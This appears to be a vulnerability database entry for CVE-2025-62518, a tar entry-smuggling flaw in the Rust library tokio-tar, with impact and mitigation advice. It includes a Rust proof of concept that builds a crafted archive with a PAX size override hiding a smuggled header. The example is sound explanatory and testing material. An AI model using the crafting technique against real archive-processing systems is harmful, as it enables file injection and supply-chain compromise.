
CVE-2025-62518: CWE-843: Access of Resource Using Incompatible Type ('Type Confusion') in astral-sh tokio-tar

Severity: High
Tags: Vulnerability, CVE-2025-62518, CWE-843
Published: Tue Oct 21 2025 (10/21/2025, 16:13:02 UTC)
Source: CVE Database V5
Vendor/Project: astral-sh
Product: tokio-tar

Description

astral-tokio-tar is a tar archive reading/writing library for async Rust. Versions of astral-tokio-tar prior to 0.5.6 contain a boundary parsing vulnerability that allows attackers to smuggle additional archive entries by exploiting inconsistent PAX/ustar header handling. When processing archives with PAX-extended headers containing size overrides, the parser incorrectly advances stream position based on ustar header size (often zero) instead of the PAX-specified size, causing it to interpret file content as legitimate tar headers. This issue has been patched in version 0.5.6. There are no workarounds.

AI-Powered Analysis

Last updated: 10/28/2025, 22:08:12 UTC

Technical Analysis

CVE-2025-62518 is a type confusion vulnerability (CWE-843) in astral-sh tokio-tar, an async tar archive library for Rust. Versions prior to 0.5.6 handle PAX-extended headers and ustar headers inconsistently while parsing an archive. When a PAX header overrides an entry's file size, the parser advances the stream position by the size field of the ustar header, which is often zero, rather than by the size given in the PAX header. The parser therefore reads the entry's file content as if it were the next tar header, which lets an attacker smuggle additional entries into the archive as it is processed. This can lead to unauthorized file extraction or overwriting, potentially exposing sensitive data or corrupting files. The vulnerability requires no privileges but does require user interaction to process a maliciously crafted archive. The CVSS v3.1 score is 8.1 (high): network attack vector, low attack complexity, no privileges required, user interaction required, high impact on confidentiality and integrity, and no impact on availability. The vulnerability was publicly disclosed on October 21, 2025, and is patched in tokio-tar 0.5.6. No exploits are known in the wild, and no workaround exists other than upgrading. The issue is particularly relevant for software projects and organizations that use tokio-tar for asynchronous tar archive processing in Rust, especially in automated pipelines or supply-chain contexts where malicious archives might be introduced.
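To make the parsing mistake concrete, here is an added Rust example (written for this page, not tokio-tar's own code) that builds a small archive with a PAX size override and walks it two ways: advancing by the ustar size field, as the vulnerable versions did, and advancing by the PAX-specified size. The entry names, the "PaxHeaders/" name prefix and the simplified end-of-archive check are assumptions of the example.

```rust
// Added illustration of the CVE-2025-62518 parsing mistake: a hand-written tar walker over a constructed archive, not tokio-tar code.
const BLOCK: usize = 512;
fn octal(field: &[u8]) -> usize {
    usize::from_str_radix(String::from_utf8_lossy(field).trim_matches(|c: char| c == '\0' || c == ' '), 8).unwrap_or(0)
}
// One 512-byte ustar header (name, size, typeflag, magic) with a valid checksum.
fn header(name: &str, typeflag: u8, size: usize) -> Vec<u8> {
    let mut h = vec![0u8; BLOCK];
    h[..name.len()].copy_from_slice(name.as_bytes());
    h[124..136].copy_from_slice(format!("{:011o}\0", size).as_bytes());
    h[156] = typeflag;
    h[257..265].copy_from_slice(b"ustar\x0000");
    let sum = h.iter().map(|&b| u32::from(b)).sum::<u32>() + 8 * 32; // chksum field counts as 8 spaces
    h[148..156].copy_from_slice(format!("{:06o}\0 ", sum).as_bytes());
    h
}
// "size=<n>" from a PAX extended-header body made of "<len> <key>=<value>\n" records.
fn pax_size(body: &[u8]) -> Option<usize> {
    String::from_utf8_lossy(body).lines().find_map(|rec| rec.split_once(' ')?.1.strip_prefix("size=")?.parse::<usize>().ok())
}
// Constructed archive: PAX record size=512, a ustar header whose size field is 0, then 512 bytes of
// file content that happen to form a well-formed header for "smuggled.txt", then end-of-archive blocks.
fn build_archive() -> Vec<u8> {
    let pax_body = b"12 size=512\n";
    let mut a = header("PaxHeaders/payload.bin", b'x', pax_body.len());
    a.extend_from_slice(pax_body);
    a.resize(2 * BLOCK, 0);
    a.extend(header("payload.bin", b'0', 0));
    a.extend(header("smuggled.txt", b'0', 0)); // this block is payload.bin's *content*
    a.resize(a.len() + 2 * BLOCK, 0);
    a
}
// Entry names seen by a walker that advances by the ustar size (trust_pax=false, the vulnerable
// behaviour) or by the PAX-overridden size (trust_pax=true, the fix). Stops at the first zero block.
fn list_entries(archive: &[u8], trust_pax: bool) -> Vec<String> {
    let (mut names, mut pos, mut pax_override) = (Vec::new(), 0usize, None::<usize>);
    while pos + BLOCK <= archive.len() && archive[pos] != 0 {
        let hdr = &archive[pos..pos + BLOCK];
        let ustar_size = octal(&hdr[124..136]);
        pos += BLOCK;
        if hdr[156] == b'x' {
            pax_override = pax_size(&archive[pos..pos + ustar_size]);
            pos += (ustar_size + BLOCK - 1) / BLOCK * BLOCK;
        } else {
            names.push(String::from_utf8_lossy(&hdr[..100]).trim_end_matches('\0').to_string());
            let size = match (trust_pax, pax_override.take()) { (true, Some(s)) => s, _ => ustar_size };
            pos += (size + BLOCK - 1) / BLOCK * BLOCK;
        }
    }
    names
}
```

Running `list_entries` over the same bytes yields one entry with the PAX size honoured and two entries without it; a quick way to check whether an archive library in a pipeline shows the same discrepancy on such input.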

Potential Impact

For European organizations, especially those relying on Rust-based tooling or infrastructure that incorporates the astral-sh tokio-tar library for asynchronous tar archive processing, the impact of CVE-2025-62518 can be significant. The vulnerability allows attackers to smuggle additional files into tar archives, potentially leading to unauthorized disclosure of sensitive information or integrity violations through overwriting or injecting malicious files. This can compromise software supply chains, automated deployment pipelines, or any system that processes tar archives from untrusted sources. Given the high confidentiality and integrity impact, organizations handling sensitive data or critical infrastructure could face data breaches or system compromise. Although availability is not directly affected, the indirect consequences of data corruption or unauthorized access could disrupt business operations. The requirement for user interaction limits automated exploitation but does not eliminate risk in environments where users or automated systems process untrusted archives. The lack of workarounds means timely patching is essential to mitigate risk. Compliance with European data protection regulations such as GDPR could also be affected if sensitive data is exposed through this vulnerability.

Mitigation Recommendations

To mitigate CVE-2025-62518, European organizations should immediately upgrade all instances of the astral-sh tokio-tar library to version 0.5.6 or later, where the vulnerability is patched. Audit all Rust projects and dependencies to identify usage of tokio-tar and ensure they are updated accordingly. Implement strict validation and sanitization of tar archives before processing, especially those originating from untrusted or external sources. Where possible, isolate archive processing in sandboxed or containerized environments to limit potential damage from malicious archives. Incorporate monitoring and alerting for unusual file extraction or modification activities related to tar archives. Educate developers and DevOps teams about the risks of processing untrusted archives and enforce policies to avoid manual processing of suspicious files. For supply chain security, verify the integrity and provenance of tar archives used in automated pipelines. Since no workarounds exist, patching remains the primary defense. Additionally, consider employing runtime application self-protection (RASP) or enhanced logging to detect exploitation attempts.


Technical Details

Data Version: 5.1
Assigner Short Name: GitHub_M
Date Reserved: 2025-10-15T15:03:28.134Z
CVSS Version: 3.1
State: PUBLISHED

Threat ID: 68f7b4a07853ccdda86f81b9

Added to database: 10/21/2025, 4:28:16 PM

Last enriched: 10/28/2025, 10:08:12 PM

Last updated: 12/7/2025, 2:46:00 PM

Views: 319

